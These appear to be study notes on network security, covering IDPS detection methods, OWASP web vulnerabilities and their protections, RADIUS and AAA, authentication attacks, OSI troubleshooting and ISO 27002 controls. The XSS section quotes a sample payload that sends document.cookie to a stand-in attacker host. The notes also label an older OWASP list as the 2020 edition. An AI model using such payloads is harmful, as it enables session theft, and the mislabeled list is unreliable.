IDPS
An IDPS monitors network traffic for signs of a possible attack. When it detects potentially dangerous activity, it takes
action to stop the attack. Often this takes the form of dropping malicious packets, blocking network traffic or resetting
connections. The IDPS also usually sends an alert to security administrators about the potential malicious activity.
Classes of detection methodologies:
•
•
•
•
•
•
•
•
•
•
•
•
Signature-based: compares known threat signatures to observed events to identify incidents.
This is very effective at detecting known threats but largely ineffective at detecting unknown threats and many
variants on known threats.
Signature-based detection cannot track and understand the state of complex communications, so it cannot detect
most attacks that comprise multiple events.
Examples:
A telnet attempt with a username of “root”, which is a violation of an organization’s security policy
An e-mail with a subject of “Free pictures!” and an attachment filename of “freepics.exe”, which are
characteristics of a known form of malware
Anomaly-based detection: sample network activity to compare to traffic that is known to be normal.
When measured activity is outside baseline parameters or clipping level, IDPS will trigger an alert.
Anomaly-based detection can detect new types of attacks.
Requires much more overhead and processing capacity than signature-based.
May generate many false positives.
For example: a profile for a network might show that Web activity comprises an average of 13% of network bandwidth at
the Internet border during typical workday hours. The IDPS then uses statistical methods to compare the characteristics of
current activity to thresholds related to the profile, such as detecting when Web activity comprises significantly more
bandwidth than expected and alerting an administrator of the anomaly.
•
•
•
Stateful protocol analysis: A key development in IDPS technologies was the use of protocol analyzers.
Protocol analyzers can natively decode application-layer network protocols, like HTTP or FTP. Once the protocols
are fully decoded, the IPS analysis engine can evaluate different parts of the protocol for anomalous behavior or
exploits against predetermined profiles of generally accepted definitions of benign protocol activity for each
protocol state.
Problems with this type include that it is often very difficult or impossible to develop completely accurate models
of protocols, it is very resource-intensive, and it cannot detect attacks that do not violate the characteristics of
generally acceptable protocol behavior.
For example: the existence of a large binary file in the User-Agent field of an HTTP request would be very unusual
and likely an intrusion. A protocol analyzer could detect this anomalous behavior and instruct the IPS engine to
drop the offending packets
Why Intrusion Detection Prevention Systems should be used?
IDPSs are primarily focused on:
•
•
•
•
Identifying possible incidents, logging information about them, attempting to stop them, and reporting them to
security administrators.
Identifying problems with security policies
Documenting existing threats
Deterring individuals from violating security policies.
•
•
Recording information related to observed events: Information is usually recorded locally, and might also be sent
to separate systems such as centralized logging servers, security information and event management (SIEM)
solutions, and enterprise management systems
Notifying security administrators of important observed events: This notification, known as an alert, may take
the form of audible signals, e-mails, pager notifications, or log entries. A notification message typically includes
only basic information regarding an event; administrators need to access the IDPS for additional information.
•
Producing reports: Reports summarize the monitored events or provide details on particular events of interest.
•
The IPS stops the attack itself: An IDPS might also alter the settings for when certain alerts are triggered or what
priority should be assigned to subsequent alerts after a particular threat is detected. IPSs respond to a detected
threat by attempting to prevent it from succeeding.
Examples: Terminate the network connection or user
session that is being used for the attack. Block access to the target (or possibly other likely targets) from the
offending user account, IP address, or other attacker attribute. Block all access to the targeted host, service,
application, or other resource.
The Top 10 OWASP vulnerabilities in 2020 are:
A1 Cross-Site Scripting (XSS)
A2 Injections Flaw
A3 Malicious File Execution
A4 Insecure Direct Object Reference
A5 Cross Site Request Forgery (CSRF)
A6Information Leakage & Improper Error Handling
A7 Broken Authentication & Session Management
A8 Insecure Cryptographic Storage
A9 Insecure Communications
A10. Failure to Restrict URL Access
Injection Flaws: particularly SQL injection, are common in web applications. Injection occurs when user-supplied data is
sent to an interpreter as part of a command or query. The attacker’s hostile data tricks the interpreter into executing
unintended commands or changing data. Some common types of command injection flaws include:



SQL injection (malicious calls to backend databases via SQL), using shell commands to run external programs
Using system calls to in turn make calls to the operating system.
Any Web application that relies on the use of an interpreter has the potential to fall victim to this type of flaw
Protection:
 Use language specific libraries to perform the same functions as shell commands and system calls
 Check for existing reusable libraries to validate input, and safely perform system functions, or develop your own.
 Perform design and code reviews on the reusable libraries to ensure security.
Other common methods of protection include:
 Use stored Procedures
 Data validation (to ensure input isn't malicious code),
 Run commands with very minimal privileges
Broken Authentication: A broken authentication vulnerability can allow an attacker to use manual and/or automatic
methods to try to gain control over any account they want in a system – or even worse – to gain complete control over the
system. Broken authentication usually refers to logic issues that occur on the application authentication’s mechanism, like
bad session management prone to username enumeration – when a malicious actor uses brute-force techniques to either
guess or confirm valid users in a system.
According to the OWASP Top 10, these vulnerabilities can come in many forms. A web application contains a broken
authentication vulnerability if it:








Permits automated attacks such as credential stuffing, where the attacker has a list of valid usernames and passwords.
Permits brute force or other automated attacks.
Permits default, weak, or well-known passwords, such as “admin/admin.″
Uses weak or ineffective credential recovery and forgot-password processes, such as “knowledge-based answers,” which
cannot be made safe.
Uses plain text, encrypted, or weakly hashed passwords.
Has missing or ineffective multi-factor authentication.
Exposes session IDs in the URL (e.g., URL rewriting).
Does not rotate session IDs after successful login.
Protection
 Password Change Controls - require users to provide both old and new passwords
 Forgotten Password Controls - if forgotten passwords are emailed to users, they should be required to reauthenticate whenever they attempt to change their email address.
 Password Strength - require at least 7 characters, with letters, numbers, and special characters both upper case
and lower case.
 Password Expiration - Users must change passwords every 90 days, and administrators every 30 days.
 Password Storage - never store passwords in plain text. Passwords should always be stored in either hashed
(preferred) or encrypted form
Cross-Site Scripting (XSS) Flaws: XSS flaws occur whenever an application takes user supplied data and sends it to a web
browser without first validating or encoding that content. XSS allows attackers to execute script in the victim's browser
which can hijack user sessions, deface web sites, possibly introduce worms, etc
3 Categories of XSS attacks:



Stored - the injected code is permanently stored (in a database, message forum, visitor log, etc.)
Reflected - attacks that are reflected take some other route to the victim (through an e-mail message, or
bounced off from some other server)
DOM injection – Injected code manipulates sites javascript code or variables, rather than HTML objects.
Example: comment=“Nice site! <SCRIPT> window.open( http://badguy.com/info.pl?document.cookie </SCRIPT>
1. Occurs when an attacker can manipulate a Web application to send malicious scripts to a third party.
2. This is usually done when there is a location that arbitrary content can be entered into (such as an e-mail
message, or free text field for example) and then referenced by the target of the attack.
3. The attack typically takes the form of an HTML tag (frequently a hyperlink) that contains malicious
scripting (often JavaScript).
4. The target of the attack trusts the Web application and thus XSS attacks exploit that trust to do things that
would not normally be allowed.
Protection

Filter output by converting text/data which might have dangerous HTML characters to its encoded format:
'<' and '>' to '&lt;' and '&gt;’
'(' and ')' to '&#40;' and '&#41;’
'#' and '&' to '&#35;' and '&#38;‘

Recommend filtering on input as much as possible. (some data may need to allow special characters.)
Malicious File Execution: Code vulnerable to remote file inclusion (RFI) allows attackers to include hostile code and
data, resulting in devastating attacks, such as total server compromise.
Malicious file execution attacks affect PHP, XML and any framework which accepts filenames or files from users.
Scenarios:



Applications which allow the user to provide a filename, or part of a filename are often vulnerable if input
is not carefully validated.
Allowing the attacker to manipulate the filename may cause application to execute a system program or
external URL.
Applications which allow file uploads have additional risks
1) Place executable code into the application
2) Replace a Session file, log file or authentication token
Protection






Do not allow user input to be used for any part of a file or path name.
Where user input must influence a file name or URL, use a fully enumerated list to positively validate the
value.
File uploads have to be done VERY carefully.
Only allow uploads to a path outside of the webroot so it can not be executed
Validate the file name provided so that a directory path is not included.
Implement or enable sandbox or chroot controls which limit the applications access to files.
Radius
•
•
•
•
Remote Authentication Dial In User Service (RADIUS) is defined in RFC 2865
Designed to authenticate dial-in-access customers
– Used for dial-in lines and 3G networks
Idea to have a centralized user database for passwords and other user information
– Cost efficient
– Easy to configure
Radius is used together with an authentication protocol such as PAP or CHAP
Radius Limitations
•
•
•
•
•
Scalability
– No explicit support for agents, proxies, ..
– Manual configuration of shared secrets
Reliability
– UDP not reliable, accounting info may be lost
Does not define failover mechanisms
– Implementation specific
Mobility support
Security
– Applied usually in trusted network segments or VPNs
– Application layer authentication and integrity only for use with Response packets
– No per packet confidentiality
What Is AAA?
AAA stands for authentication, authorization, and accounting.
AAA is a framework for controlling access to computer resources, enforcing policies, auditing usage, and providing the
information necessary to bill for services. These processes working in concert are important for effective network
management and security.
Authentication
Authentication provides a method of identifying a user, typically by having the user enter a valid username and password
before access to the network is granted. Authentication is based on each user having a unique set of login credentials for
gaining network access.
Authorization
Following authentication, a user must gain authorization for doing certain tasks. After logging in to a system, for instance,
the user may try to issue commands. The authorization process determines whether the user has the authority to issue such
commands.
Accounting
The last part in the AAA framework is accounting, which monitors the resources a user consumes during network access.
This can include the amount of system time or the amount of data sent and received during a session.
Accounting is carried out by logging session statistics and usage information. It is used for authorization control, billing, trend
analysis, resource utilization, etc
Attacks against authentication
•
Eavesdropping passwords and credentials: An eavesdropping attack, which are also known as a sniffing or
snooping attack, where someone tries to steal information that computers, smart phones, or other devices transmit
over a network. An eavesdropping attack takes advantage of unsecured network communications in order to access
the data being sent and received. Eavesdropping attacks are difficult to detect because they do not cause network
transmissions to appear to be operating abnormally
•
•
Replaying credentials: A replay attack (also known as playback attack) is a form of network attack in which a
valid data transmission is maliciously or fraudulently repeated or delayed. This is carried out either by the originator
or by an adversary who intercepts the data and re-transmits it.
•
•
Man-in-the-Middle (MiTM): a man-in-the-middle attack (MITM) is an attack where the attacker secretly relays and
possibly alters the communication between two parties who believe they are directly communicating with each
other. One example of man-in-the-middle attacks is active eavesdropping, in which the attacker makes independent
connections with the victims and relays messages between them to make them believe they are talking directly to
each other over a private connection, when in fact the entire conversation is controlled by the attacker. The attacker
must be able to intercept all relevant messages passing between the two victims and inject new ones.
•
•
Resource exhaustion
–
–
–
•
Any exhaustion attack on resources
Signature checking, token creation
Entropy attacks
Password guessing / brute force (sniffing)
Troubleshooting with the OSI Model
the TCP/IP model.
Layer 1 - Physical
-Do we have power?
-Are the Ethernet cables fully connected?
-Do we have link-beat?
-Has any equipment failed?
Layer 2 - Datalink
-Can we see devices on our local network?
-Do we have old MAC address entries in the ARP table?
-How “far” can we ping?
-Do we have a speed/duplex mis-match (many errors on a
port)?
-Do we have a spanning tree loop (high broadcast traffic)?
Layer 3 - Network
-Do we have an IP address, mask and default gateway?
-Can we ping our default gateway?
-Can we ping past our default gateway?
-Are names being resolved to IP addresses (DNS)?
Layer 4 - Transport
-Do some protocols work and others don’t?
-Is there a software firewall running on the PC/server?
-What are the network firewall rules?
Layer 7 - Application
-Can the application connect to the server/data?
-Do other applications work on the same machine?
-Does the same application work on other machines?
-Is there an error message we can search for?
-Are we fully patched?
Advantages of Frameworks Adoption across industries:






Defense Against Lawsuits
Alignment with Accepted Level of Security
Benchmark for Comparison
Structure
Ensure Proper Adoption of Key Functions
Customer and Partner Confidence
A conceptual information security framework is an analytical tool with several variations and contexts. It is used to
make conceptual distinctions and organize ideas about the security of information regarding any field. Information
Security audit and assessment is a systemic way for measuring technical assessment of how the organizations
security policy is employed. It is part of the on-going process of defining and maintaining effective security policies.
The audit subsystems which are in the commercial database system allow to have a detailed information about the
database users, database objects and operations on the data should be highly observed and the information which
is being taken by the audit. The database Audit should not only secure the database but also the organization itself
so that it can perform tasks risk free.
•
ISO 27002 - Code of Practice
ISO 27002 (Annex A for ISO 27001) establishes guidelines and general principles for initiating, implementing,
maintaining, and improving security management in an organization.
5.
6.
7.
8.
9.
10.
11.
12.
13.
14.
15.
16.
17.
18.
Information Security Policies
Organization of Information Security
Human Resource Security
Asset Management
Access Control
Cryptography
Physical and Environmental Security
Operations Security
Communications Security
Systems Acquisition, Development and Maintenance
Supplier Relationships
Information Security Incident Management
Information Security Aspects of Business Continuity Management
Compliance
•
•
5- Information Security Policies: To provide management direction and support for information security in
accordance with business requirements and relevant laws and regulations.
Key Concepts:
Information Security Policies
Regular Review of Policy
6 - Organization of Information Security:
6.1 To establish a management framework to initiate and control the implementation of
information security within the organization.
6.2 To ensure the security of teleworking and use of mobile devices.
•
•
•
•
•
•
Key Concepts:
Roles and Responsibilities
Segregation of Duties
Contact with Authorities and Special Interest
Groups
Information Security in Project Management
Mobile Device Policy
Teleworking
7. Human Resources
7.1 To ensure that employees, contractors and external party users understand their responsibilities and are
suitable for the roles they are considered for.
7.2 To ensure that employees and external party users are aware of and fulfill their information security
responsibilities.
7.3 To protect the organization’s interests as part of the process of changing or terminating employment.
•
•
•
•
•
Key Concepts:
Resource Screening
Terms & Conditions of Employment
Management Responsibilities
Information Security Awareness, Education
and Training
Termination / Change in Employment
Responsibilities
8. Asset Management
8.1 To achieve and maintain appropriate protection of organizational assets.
8.2 To ensure that information receives an appropriate level of protection in accordance with its importance to
the organization.
8.3 To prevent unauthorized disclosure, modification, removal or destruction of information stored on media.
•
•
•
•
•
•
•
•
Key Concepts:
Asset Inventory & Ownership
Acceptable User of Assets
Return of Assets
Information Classification
Labeling & Handling of Assets
Management of Removable Media
Disposal of Media
Physical Media Transfer